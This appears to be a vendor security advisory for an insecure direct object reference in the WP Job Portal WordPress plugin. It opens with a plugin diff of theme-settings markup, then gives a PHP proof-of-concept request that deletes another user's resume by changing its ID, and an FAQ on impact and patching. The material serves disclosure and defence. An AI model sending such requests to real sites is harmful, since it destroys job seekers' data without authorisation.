+                                class="set_theme"><?php echo esc_html(__('Forest Lime', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#db4453;"></div>
+                            <div class="color 2" style="background:#80000d;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#" class="set_theme"><?php echo esc_html(__('Rose Berry', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#967bdc;"></div>
+                            <div class="color 2" style="background:#391a8c;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#"
+                                class="set_theme"><?php echo esc_html(__('Deep Amethyst', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                    <div class="theme_platte">
+                        <div class="color_wrapper">
+                            <div class="color 1" style="background:#000000;"></div>
+                            <div class="color 2" style="background:#120045;"></div>
+                            <div class="color 3" style="background:#575757;"></div>
+                            <a href="#"
+                                class="set_theme"><?php echo esc_html(__('Midnight Mode', 'wp-job-portal')); ?></a>
+                        </div>
+                    </div>
+                </div>
+                <form action="<?php echo esc_url(wp_nonce_url(admin_url('admin.php?page=wpjobportal_theme&task=savetheme&action=task'), 'wpjobportal_theme_nonce')); ?>" method="POST" name="adminForm" id="adminForm">
+                    <div class="wp-section-title wpjp-tuning-sect">
+                        <div class="wp-icon-box-txt-wrp">
+                            <div class="wp-icon-box pink">
+                                <svg xmlns="http://www.w3.org/2000/svg" width="18" height="24" viewBox="0 0 24 24"
+                                    fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
+                                    stroke-linejoin="round" data-lucide="sliders-horizontal"
+                                    class="lucide lucide-sliders-horizontal">
+                                    <path d="M10 5H3"></path>
+                                    <path d="M12 19H3"></path>
+                                    <path d="M14 3v4"></path>
+                                    <path d="M16 17v4"></path>
+                                    <path d="M21 12h-9"></path>
+                                    <path d="M21 19h-5"></path>
+                                    <path d="M21 5h-7"></path>
+                                    <path d="M8 10v4"></path>
+                                    <path d="M8 12H3"></path>
+                                </svg>
+                            </div>
+                            <h2><?php echo esc_html(__('Fine Tuning', 'wp-job-portal')); ?></h2>
+                        </div>
+                    </div>
                     <div class="color_portion">
                         <span class="color_title">
                             <?php echo esc_html(__('Primary Color', 'wp-job-portal')); ?>
                         </span>
                         <span class="color_wrp">
-                            <input type="text" name="color1" id="color1" value="<?php echo esc_attr(wpjobportal::$_data[0]['color1']); ?>" style="background:<?php echo esc_attr(wpjobportal::$_data[0]['color1']); ?>;"/>
+                            <input type="text" name="color1" id="color1" value="<?php echo esc_attr(wpjobportal::$_data[0]['color1']); ?>" style="background:<?php echo esc_attr(wpjobportal::$_data[0]['color1']); ?> !important;" />
                             <span class="color_wrp_img">
                                 <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/themes/colorpicker.png">
                             </span>
@@ -79,7 +181,7 @@
                         <span class="color_title">
                             <?php echo esc_html(__('Secondary Color', 'wp-job-portal')); ?></span>
                         <span class="color_wrp">
-                            <input type="text" name="color2" id="color2" value="<?php echo esc_attr(wpjobportal::$_data[0]['color2']); ?>" style="background:<?php echo esc_attr(wpjobportal::$_data[0]['color2']); ?>;"/>
+                            <input type="text" name="color2" id="color2" value="<?php echo esc_attr(wpjobportal::$_data[0]['color2']); ?>" style="background:<?php echo esc_attr(wpjobportal::$_data[0]['color2']); ?> !important;" />
                             <span class="color_wrp_img">
                                 <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/themes/colorpicker.png">
                             </span>
@@ -90,7 +192,7 @@
                             <?php echo esc_html(__('Content Color', 'wp-job-portal')); ?>
                         </span>
                         <span class="color_wrp">
-                            <input type="text" name="color3" id="color3" value="<?php echo esc_attr(wpjobportal::$_data[0]['color3']); ?>" style="background:<?php echo esc_attr(wpjobportal::$_data[0]['color3']); ?>;"/>
+                            <input type="text" name="color3" id="color3" value="<?php echo esc_attr(wpjobportal::$_data[0]['color3']); ?>" style="background:<?php echo esc_attr(wpjobportal::$_data[0]['color3']); ?> !important;" />
                             <span class="color_wrp_img">
                                 <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/themes/colorpicker.png">
                             </span>
@@ -98,21 +200,429 @@
                     </div>
                     <input type="hidden" name="form_request" value="wpjobportal" />
                 </form>
+                <div class="wpjobportal-add-button-wrp">
+                    <a class="wpjobportal-add-link button" id="saveColors" href="#"
+                        title="<?php echo esc_attr(__('Save Colors', 'wp-job-portal')) ?>">
+                        <?php echo esc_html(__('Save Colors', 'wp-job-portal')) ?>
+                    </a>
+                    <div class="wpjobportal-sugestion-alert-wrp">
+                        <div class="wpjobportal-sugestion-alert">
+                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" data-lucide="info" size="14" style="display:inline; vertical-align:middle;" class="lucide lucide-info"><circle cx="12" cy="12" r="10"></circle><path d="M12 16v-4"></path><path d="M12 8h.01"></path></svg>
+                            <?php echo esc_html(__('Some changes may require clearing your cache to take effect.', 'wp-job-portal')) ?>
+                        </div>
+                    </div>
+                </div>
             </div>
             <div class="js_effect_preview">
-                <h1><?php echo esc_html(__('Live Preview Not available at the moment !', 'wp-job-portal')); ?></h1>
+                <div class="js_preview-sidetitle">
+                    <div class="js_preview-sidetitle_icon">
+                        <svg xmlns="http://www.w3.org/2000/svg" width="28" height="36" viewBox="0 0 24 24" fill="none"
+                            stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
+                            data-lucide="monitor" style="color: var(--primary);" class="lucide lucide-monitor">
+                            <rect width="20" height="14" x="2" y="3" rx="2"></rect>
+                            <line x1="8" x2="16" y1="21" y2="21"></line>
+                            <line x1="12" x2="12" y1="17" y2="21"></line>
+                        </svg>
+                    </div>
+                    <?php echo esc_html(__('Live Preview', 'wp-job-portal')); ?>
+                </div>
+                <div class="wjportal-main-up-wrapper">
+                    <div class="wjportal-main-wrapper wjportal-clearfix">
+                        <div class="wjportal-page-header">
+                            <div class="wjportal-page-header-cnt">
+                                <div class="wjportal-page-heading">
+                                    <?php echo esc_html(__('My Jobs', 'wp-job-portal')); ?></div>
+                                <div class="wjportal-breadcrumbs-wrp">
+                                    <div class="wjportal-breadcrumbs-links wjportal-breadcrumbs-firstlinks"><a
+                                            class="wjportal-breadcrumbs-link"
+                                            href="#"><?php echo esc_html(__('Dashboard', 'wp-job-portal')); ?></a>
+                                    </div>
+                                    <div class="wjportal-breadcrumbs-links wjportal-breadcrumbs-lastlink">
+                                        <?php echo esc_html(__('My Jobs', 'wp-job-portal')); ?></div>
+                                </div>
+                            </div>
+                            <div class="wjportal-header-actions">
+                                <div class="wjportal-filter-wrp">
+                                    <div class="wjportal-filter"><select name="sorting" id="sorting"
+                                            onchange="changeCombo()">
+                                            <option value=""><?php echo esc_html(__('Default', 'wp-job-portal')); ?>
+                                            </option>
+                                            <option class="" value="1">
+                                                <?php echo esc_html(__('Job Title', 'wp-job-portal')); ?></option>
+                                            <option class="" value="2">
+                                                <?php echo esc_html(__('Company Name', 'wp-job-portal')); ?></option>
+                                            <option class="" value="3">
+                                                <?php echo esc_html(__('Category', 'wp-job-portal')); ?></option>
+                                            <option class="" value="5">
+                                                <?php echo esc_html(__('Location', 'wp-job-portal')); ?></option>
+                                            <option class="" value="7">
+                                                <?php echo esc_html(__('Status', 'wp-job-portal')); ?></option>
+                                            <option class="" value="4">
+                                                <?php echo esc_html(__('Job Type', 'wp-job-portal')); ?></option>
+                                            <option class="" selected="selected" value="6">
+                                                <?php echo esc_html(__('Created', 'wp-job-portal')); ?></option>
+                                            <option class="" value="8">
+                                                <?php echo esc_html(__('Salary', 'wp-job-portal')); ?></option>
+                                        </select> </div>
+                                    <div class="wjportal-filter-image"><a class="sort-icon" href="#"
+                                            data-image1="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/sort-up.png"
+                                            data-image2="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/sort-down.png"
+                                            data-sortby="2"><img decoding="async" id="sortingimage"
+                                                src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/sort-down.png"></a>
+                                    </div>
+                                </div>
+                                <div class="wjportal-act-btn-wrp"> <a class="wjportal-act-btn" href="#">
+                                        <i class="fa fa-plus"></i><?php echo esc_html(__('Add New Job', 'wp-job-portal')); ?></a>
+                                </div>
+                            </div>
+                        </div>
+                        <div class="wjportal-jobs-list-wrapper wjportal-my-jobs-wrp">
+                            <form id="job_form" method="post" action="#">
+                                <div
+                                    class="wjportal-jobs-list  wpjobportal-list-item-status-approved  wpjobportal-list-item-is-featured  ">
+                                    <div class="wjportal-jobs-list-top-wrp object_11" data-boxid="job_11">
+                                        <div class="wjportal-jobs-logo">
+                                            <a href="#">
+                                                <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/default_logo.png" alt="Company logo">
+                                            </a>
+                                        </div>
+
+                                        <div class="wjportal-jobs-cnt-wrp">
+                                            <div class="wjportal-jobs-middle-wrp">
+                                                <div class="wjportal-jobs-data">
+                                                </div>
+                                                <div class="wjportal-jobs-data">
+                                                    <span class="wjportal-job-title">
+                                                        <a href="#">
+                                                            <?php echo esc_html(__('Android Developer', 'wp-job-portal')); ?>
+                                                        </a>
+                                                        <span class="wjportal-featured-tag-icon-wrp">
+                                                            <span class="wjportal-featured-tag-icon">
+                                                                <i class="fa fa-star"></i>
+                                                            </span>
+                                                            <span class="featurednew-onhover wjportal-featured-hover-wrp" id="gold11" style="display:none"> <?php echo esc_html(__('Expiry Date', 'wp-job-portal')); ?> : 12/28/2025 </span>
+                                                        </span>
+
+                                                    </span>
+                                                    <span class="wjportal-item-status" style="background:#00a859;">
+                                                        <?php echo esc_html(__('Publish', 'wp-job-portal')); ?></span>
+                                                    <a class="wjportal-companyname"
+                                                        href="#"><?php echo esc_html(__('Buruj
+                                                        Solution', 'wp-job-portal')); ?></a>
+                                                </div>
+                                                <div class="wjportal-jobs-data">
+                                                    <span class="wjportal-jobs-data-text wjportal-jobs-data-icon-class-category">
+                                                        <?php echo esc_html(__('Computer/IT', 'wp-job-portal')); ?></span>
+                                                    <span class="wjportal-jobs-data-text wjportal-jobs-data-icon-class-location">
+                                                        <?php echo esc_html(__('Karachi, Pakistan', 'wp-job-portal')); ?>
+                                                    </span>
+                                                </div>
+                                            </div>
+                                            <div class="wjportal-jobs-right-wrp">
+                                                <div class="wjportal-jobs-info">
+                                                    <span class="wjportal-job-type" style="background:#00abfa">
+                                                        <?php echo esc_html(__('Full-Time', 'wp-job-portal')); ?>
+                                                    </span>
+                                                </div>
+                                                <div class="wjportal-jobs-info">
+                                                    <div class="wjportal-jobs-salary">
+                                                        1,000 - 1,500 $<span class="wjportal-salary-type"> /
+                                                            <?php echo esc_html(__('Per Month', 'wp-job-portal')); ?></span>
+                                                    </div>
+                                                </div>
+                                                <div class="wjportal-jobs-info">
+                                                    8 <?php echo esc_html(__('hours Ago', 'wp-job-portal')); ?> </div>
+                                                <div class="wjportal-jobs-status">
+                                                    <span class="wjportal-jobs-status-text "></span>
+                                                </div>
+
+                                            </div>
+                                        </div>
+                                    </div>
+                                    <div class="wjportal-jobs-list-btm-wrp">
+                                        <div class="wjportal-jobs-action-wrp"><a
+                                                class="wjportal-jobs-act-btn wjportal-list-act-btn-edit"
+                                                job=""
+                                                href="#"><?php echo esc_html(__('Edit Job', 'wp-job-portal')); ?></a>
+                                            <a class="wjportal-jobs-act-btn wjportal-list-act-btn-delete"
+                                                href="#"
+                                                ><?php echo esc_html(__('Delete Job', 'wp-job-portal')); ?></a>
+                                            <a class="wjportal-jobs-act-btn wjportal-list-act-btn-copy-job" href="#"
+                                                >
+                                                <?php echo esc_html(__('Copy Job', 'wp-job-portal')); ?></a>
+                                            <a class="wjportal-jobs-act-btn wjportal-jobs-apply-res wjportal-list-act-btn-applied-resumes"
+                                                title="Resume"
+                                                href="#"><?php echo esc_html(__('Resume', 'wp-job-portal')); ?>
+                                                (0)</a> <a
+                                                class="wjportal-jobs-act-btn wjportal-jobs-act-btn-ai-suggested-resumes"
+                                                href="#"><?php echo esc_html(__('Suggested Resumes', 'wp-job-portal')); ?></a>
+                                        </div>
+                                    </div>
+                                </div>
+
+                                <div class="wjportal-jobs-list  wpjobportal-list-item-status-approved  ">
+                                    <div class="wjportal-jobs-list-top-wrp object_10" data-boxid="job_10">
+                                        <div class="wjportal-jobs-logo">
+                                            <a
+                                                href="#">
+                                                <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/default_logo.png"
+                                                    alt="Company logo">
+                                            </a>
+                                        </div>
+
+                                        <div class="wjportal-jobs-cnt-wrp">
+                                            <div class="wjportal-jobs-middle-wrp">
+                                                <div class="wjportal-jobs-data">
+                                                </div>
+                                                <div class="wjportal-jobs-data">
+                                                    <span class="wjportal-job-title">
+                                                        <a
+                                                            href="#">
+                                                            <?php echo esc_html(__('PHP Developer', 'wp-job-portal')); ?></a>
+                                                    </span>
+                                                    <span class="wjportal-item-status"
+                                                        style="background:#00a859;"><?php echo esc_html(__('Publish', 'wp-job-portal')); ?></span>
+                                                    <a class="wjportal-companyname"
+                                                        href="#"><?php echo esc_html(__('Buruj Solution', 'wp-job-portal')); ?></a>
+                                                </div>
+                                                <div class="wjportal-jobs-data">
+                                                    <span class="wjportal-jobs-data-text wjportal-jobs-data-icon-class-category">
+                                                        <?php echo esc_html(__('Computer/IT', 'wp-job-portal')); ?></span>
+                                                    <span class="wjportal-jobs-data-text wjportal-jobs-data-icon-class-location">
+                                                        <?php echo esc_html(__('Gujranwala, Pakistan', 'wp-job-portal')); ?></span>
+                                                    </span>
+                                                </div>
+                                            </div>
+                                            <div class="wjportal-jobs-right-wrp">
+                                                <div class="wjportal-jobs-info">
+                                                    <span class="wjportal-job-type" style="background:#00abfa">
+                                                        <?php echo esc_html(__('Full-Time', 'wp-job-portal')); ?>
+                                                    </span>
+                                                </div>
+                                                <div class="wjportal-jobs-info">
+                                                    <div class="wjportal-jobs-salary">
+                                                        1,000 - 1,500 $ <span class="wjportal-salary-type"> /
+                                                            <?php echo esc_html(__('Per Month', 'wp-job-portal')); ?></span>
+                                                    </div>
+                                                </div>
+                                                <div class="wjportal-jobs-info">
+                                                    8 <?php echo esc_html(__('hours Ago', 'wp-job-portal')); ?> </div>
+                                                <div class="wjportal-jobs-status">
+                                                    <span class="wjportal-jobs-status-text "></span>
+                                                </div>
+
+                                            </div>
+
+                                        </div>
+                                    </div>
+                                    <div class="wjportal-jobs-list-btm-wrp">
+                                        <div class="wjportal-jobs-action-wrp"><a
+                                                class="wjportal-jobs-act-btn wjportal-list-act-btn-edit"
+                                                job=""
+                                                href="#/10"><?php echo esc_html(__('Edit Job', 'wp-job-portal')); ?></a>
+                                            <a href="#" data-spectype="featured" id="featuredjob10"
+                                                data-anchorid="featuredjob10"
+                                                class="wjportal-jobs-act-btn  wjportal-list-act-btn-featured"
+                                                >
+                                                <?php echo esc_html(__('Add Featured ', 'wp-job-portal')); ?></a>
+                                            <a class="wjportal-jobs-act-btn wjportal-list-act-btn-delete"
+                                                href="#"
+                                                ><?php echo esc_html(__('Delete Job', 'wp-job-portal')); ?></a>
+                                            <a class="wjportal-jobs-act-btn wjportal-list-act-btn-copy-job" href="#"
+                                                >
+                                                <?php echo esc_html(__('Copy Job', 'wp-job-portal')); ?></a>
+                                            <a class="wjportal-jobs-act-btn wjportal-jobs-apply-res wjportal-list-act-btn-applied-resumes"
+                                                title="Resume"
+                                                href="#"><?php echo esc_html(__('Resume', 'wp-job-portal')); ?>
+                                                (1)</a> <a
+                                                class="wjportal-jobs-act-btn wjportal-jobs-act-btn-ai-suggested-resumes"
+                                                href="#"><?php echo esc_html(__('Suggested Resumes', 'wp-job-portal')); ?></a>
+                                        </div>
+                                    </div>
+                                </div>
+
+                                <div class="wjportal-jobs-list  wpjobportal-list-item-status-approved  ">
+                                    <div class="wjportal-jobs-list-top-wrp object_10" data-boxid="job_10">
+                                        <div class="wjportal-jobs-logo">
+                                            <a
+                                                href="#">
+                                                <img src="<?php echo esc_url(WPJOBPORTAL_PLUGIN_URL); ?>includes/images/default_logo.png"
+                                                    alt="Company logo">
+                                            </a>
+                                        </div>
+
+                                        <div class="wjportal-jobs-cnt-wrp">
+                                            <div class="wjportal-jobs-middle-wrp">
+                                                <div class="wjportal-jobs-data">
+                                                </div>
+                                                <div class="wjportal-jobs-data">
+                                                    <span class="wjportal-job-title">
+                                                        <a
+                                                            href="#">
+                                                            <?php echo esc_html(__('Accountant', 'wp-job-portal')); ?></a>
+                                                    </span>
+                                                    <span class="wjportal-item-status"
+                                                        style="background:#00a859;"><?php echo esc_html(__('Publish', 'wp-job-portal')); ?></span>
+                                                    <a class="wjportal-companyname"
+                                                        href="#"><?php echo esc_html(__('Buruj Solution', 'wp-job-portal')); ?></a>
+                                                </div>
+                                                <div class="wjportal-jobs-data">
+                                                    <span class="wjportal-jobs-data-text wjportal-jobs-data-icon-class-category" >
+                                                        <?php echo esc_html(__('Computer/IT', 'wp-job-portal')); ?></span>
+                                                    <span class="wjportal-jobs-data-text wjportal-jobs-data-icon-class-location">
+                                                        <?php echo esc_html(__('Lahore, Pakistan', 'wp-job-portal')); ?>
+                                                    </span>
+                                                </div>
+                                            </div>
+                                            <div class="wjportal-jobs-right-wrp">
+                                                <div class="wjportal-jobs-info">
+                                                    <span class="wjportal-job-type" style="background:#00abfa">
+                                                        <?php echo esc_html(__('Full-Time', 'wp-job-portal')); ?>
+                                                    </span>
+                                                </div>
+                                                <div class="wjportal-jobs-info">
+                                                    <div class="wjportal-jobs-salary">
+                                                        1,000 - 1,500 $ <span class="wjportal-salary-type"> /
+                                                            <?php echo esc_html(__('Per Month', 'wp-job-portal')); ?></span>
+                                                    </div>
+                                                </div>
+                                                <div class="wjportal-jobs-info">
+                                                    8 <?ph

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24379 - Job Portal <= 2.4.3 - Authenticated (Subscriber+) Insecure Direct Object Reference

<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$cookie = 'wordpress_logged_in_abc=...'; // Authenticated session cookie for a Subscriber user
$victim_resume_id = 123; // ID of a resume not owned by the attacker

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Cookie: ' . $cookie,
    'Content-Type: application/x-www-form-urlencoded'
]);

// The exact action parameter depends on the plugin's AJAX hook registration.
// This example assumes a common pattern for deleting a resume.
$post_data = http_build_query([
    'action' => 'wpjobportal_ajax', // Common AJAX action for the plugin
    'task' => 'deleteResume', // Task parameter triggering the vulnerable function
    'id' => $victim_resume_id // The user-controlled key vulnerable to IDOR
]);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Code: $http_coden";
echo "Response: $responsen";

// A successful exploit will delete the victim's resume.
// The response may indicate success or failure.
?>

Frequently Asked Questions

What is CVE-2026-24379?
Overview of the vulnerability
CVE-2026-24379 is a medium severity vulnerability in the WP Job Portal plugin for WordPress, affecting versions up to and including 2.4.3. It is classified as an Insecure Direct Object Reference (IDOR), allowing authenticated users with Subscriber-level access to perform unauthorized actions by manipulating user-controlled keys.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing validation on a user-controlled key in the resume deletion functionality. An authenticated attacker can send a request to delete a resume by altering the resume ID parameter, potentially deleting resumes owned by other users.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the WP Job Portal plugin version 2.4.3 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to delete resumes that do not belong to them.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the WP Job Portal plugin installed. If it is version 2.4.3 or earlier, your site is at risk. You can find the version in the WordPress admin dashboard under Plugins.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.4.4 of the WP Job Portal plugin. To fix the issue, update the plugin to the latest version available in the WordPress plugin repository or your site’s admin dashboard.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the WP Job Portal plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access to authenticated users.
What does the CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it can still lead to significant issues such as unauthorized data deletion, impacting user trust and data integrity.
What are the practical implications of this vulnerability?
Potential risks to data
Successful exploitation allows attackers to delete resumes belonging to other users, leading to data loss and potential disruption for job seekers. This can affect the platform’s reliability and user confidence.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can manipulate the resume ID parameter in a request to delete a resume. It illustrates the lack of ownership checks, enabling unauthorized actions against other users’ data.
What is Insecure Direct Object Reference (IDOR)?
Definition of IDOR
IDOR is a type of access control vulnerability where an attacker can access or modify objects (like files or database records) by manipulating identifiers in requests. This occurs when the application does not properly validate user permissions for the requested object.
What steps should I take after updating the plugin?
Post-update actions
After updating to version 2.4.4, monitor your site for any unusual activity and review user permissions. It is also advisable to conduct a security audit to ensure no other vulnerabilities exist.
Can this vulnerability be exploited remotely?
Exploitation context
Yes, this vulnerability can be exploited remotely by authenticated users who have access to the WordPress site. The attacker needs to be logged in with at least Subscriber privileges to perform the exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations